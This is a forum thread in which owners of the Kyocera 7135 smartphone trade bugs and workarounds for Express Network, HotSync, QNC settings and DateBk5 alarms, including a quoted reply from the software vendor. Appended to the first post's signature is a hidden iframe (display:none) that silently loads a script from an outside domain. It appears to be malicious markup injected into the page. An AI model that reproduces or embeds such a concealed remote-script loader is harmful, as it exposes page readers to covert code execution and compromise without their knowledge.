+ Reply to Thread

Bugs / workarounds...

Everyone,

I am really enjoying this phone / device -- just got the SD card and fooled around with sound and photos, etc. The 7135 is certainly one of the great engineering feats of our time. But we're early adopters and there are a few Gotcha's/bugs. Generally, I've found this to be a much better phone than the 6035 that I have been using since it came out.

You can check the version of your firmware by hitting six 1’s in the phone app and then selecting the options menu option at the bottom of the menu. Mine is

SW Version: SZ 1.0.13 / MZ1.0.27.

Here are some bugs/workarounds that I have found.

1) If you use express network using the PDA or a laptop the phone side will shut off and sometimes lockup if you switch between the phone app and the Fax/Modem app while an Express Network connection is active (especially when it goes dormant). You won’t have any problems as long as you shut the connection off before switching in and out of these apps.

2) The 7135 has frozen a few times after being on a call (and hanging up) and launching Datebk5 from the phone app. A soft reset gets you back in business. I don’t know what causes this.

3) I’ve had a few issues with the phone and USB – sometimes when in the cradle it is recognized as an unknown USB device and you can’t HotSync. Starting a Fax/Modem connection, quitting it, and then Hotsyncing seems to solve the problem. This is a lot faster than rebooting the phone and PC which also solves the problem.

4) After using Express Network, you might see some “Calls from Unknown” in your call list – just weird – but it doesn’t cause a problem.

5) Since I had Verizon enable Express Network, 14.4 qnc connections don’t work all the time and neither does the Open Wave WAP browser (it seems to use the QNC connection that can’t authenticate). Someone posted the correct setting and it was working again last night – but now it is broken again – I can’t authenticate via a PC or the PDA. I’ll call Verizon to figure this out.

That’s all I have found after some heavy use. There are many things that work better than the 6035 – especially alarms handled in silent mode via DateBk5 – this never worked right for me on the 6035.

Can anyone else post other problems and workarounds?

Glenn<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't know if this is a problem or bug but on incoming data calls on the Express Network (I use NotifyLink to push emails to my phone from Outllok), you get a single chime that is not very loud and easy to miss. You then see data call on the display. I have not been able to find any place to change the notification to something more significant. It is easy to miss. Then it leaves you connected to the Express Network where I am paying for the minutes.

John
    John

For more information see barJohn Reviews It

On many different alarms, when you open the phone they are there very briefly and then the phone display switches to either the PDA or the Phone display and the alarm message/display is gone.
    John

Re: Bugs / workarounds...

Originally posted by glenn_butler
    5) Since I had Verizon enable Express Network, 14.4 qnc connections don’t work all the time and neither does the Open Wave WAP browser (it seems to use the QNC connection that can’t authenticate). Someone posted the correct setting and it was working again last night – but now it is broken again – I can’t authenticate via a PC or the PDA. I’ll call Verizon to figure this out.
    Can anyone else post other problems and workarounds?

Glenn
    Once it stopped working, did you check the QNC script again. I've found that the first line will revert back to 3 for some reason. Change it back to 2 and you are back in business.

Andy

When I select Avantgo, my 7135 immediately dies and I have to perform a soft reset every time. Any suggestions?

MarkC,

I have not had any problems with Avant Go since moving to the 7135 -- and I think I am on a version that auto updates.

I went into AvantGo and checked my version using Help | About. It is 4.2 Build 1165.

If you can't do this, I would delete Avantgo from your Palm, download the latest, and re-install it. You could have an old version.

Good Luck,

Glenn

barjohn - go to prefs pda and under general adjust system or alarm volume. Then you can go to messages and under incoming messages select the type of notification you desire.

I'll try and see if that helps, but I think I had that setup before and it didn't beep very loudly.

John
    John

Datebk5

Here is the response from CESD, Pimlico Software, Inc. We all have been implementing the only solution to date -- uncheck the box for Datebk5 to handle the alarms. It appears that I am the only one who has written about the problem so if you want a fix, let CESD know about it!:
    ===========================
    Well, this is the first I have heard of this issue. It is quite possible that Kyocera's implementation of the Alarm Manager is flawed or has introduced a significant incompatibility which was never caught during testing (this could easily happen since they might well have made the incorrect assumption that most applications would use the Attention manager). This is not really the case since the Attention manager is incompatible with the vast majority of Palm OS devices in the field which are pre-OS4 deivces and it is not practical (certainly in a complex app like DateBK5) to support both because there is insufficient memory (alarm handling has to reside in the first 64k segment of memory which is already almost completely full in DateBk5).

If it IS a flaw in the Kyocera Palm OS that would not be a good sign as there is nothing that can be done about it in DateBK5. DateBk5 does depend upon the Palm OS functioning properly, and the Alarm Manager should operate correctly on all Palm OS devices.

My current plan is to support the Attention Manager in the next major release of DateBk, but this is also planned to be an ARM-only version since by using native Arm code, DateBk will run about ten times faster than it does now - and that is something that cannot be ignored once native Arm applications become popular.

For now, the only solution may be to simply uncheck that box in the Alarm Preferences.

Thanks for this information. At this time, I have nothing further to add (except note below on stack space) since this is the first report I've received here about this issue. I have received at least 50-100+ emails from people with 7135's with questions about other issues and no one has ever mentioned an alarm problem. So does "many of us" - mean a majority of people on that forum with DateBk5? Or is this something that just a small number of total DateBk5 users are reporting?

DateBk5 users are often power users and have lots of software loaded. There have always been issues with people running hacks and DateBk5 -- hacks that steal a lot of stack space, and if Kyocera provides less stack space than other versions of the Palm OS, this could be the cause of the problem. You might want to look into using TealMemBrain which allows you to alter the amount of stack space allocated to an application. By allocating more stack space to DateBk5, you might find that the problem goes away, so I would suggest that someone with a 7135 definitely check this out.

Cheers!
    CESD, Pimlico Software, Inc.

Just FYI, I have about 13 megs of RAM filled, use about 5 hacks, and don't seem to have problems with Datebk5 alarms. They go off appropriately, and without freezes....I *do* have problem (as noted in another thread) with BugMe or Diddlebug alarms, which are very loud. Unfortunately, if I put the phone in "silent" mode, the Bugme or Diddlebug alarms don't go off at all (ie, they don't even vibrate). My sense (looking at all the posts) is that there *is* some issue with how alarms are handled in the 7135 OS, and some of it may relate specifically to what apps or hacks one has installed....

I know for a fact that more people than just Beryl have written to DateBK5 about the alarm problem. Oh well. It is still WELL worth using, even without the alarms.
    ~'kito
    pdaPhoneHome Moderator

After Purchase 7135 Bug Fixes

Does anyone know if early 7135's can be upgraded to add bug fixesafter purchase? Would Kyocers or Verizon be helpful in this regard? Cost involved?

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    Once Verizon releases the phone, any bug changes with either the phone or the palm-side operating system can be updated by Verizon. They've always done this kind of upgrade for free. Many advanced users have their own copies of the wireless tools, and choose to make the upgrades themselves. They're also a risk that your data may be lost during the upgrade -- therefore, a full backup, especially w/ something like BackupBuddy is highly recommended.
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)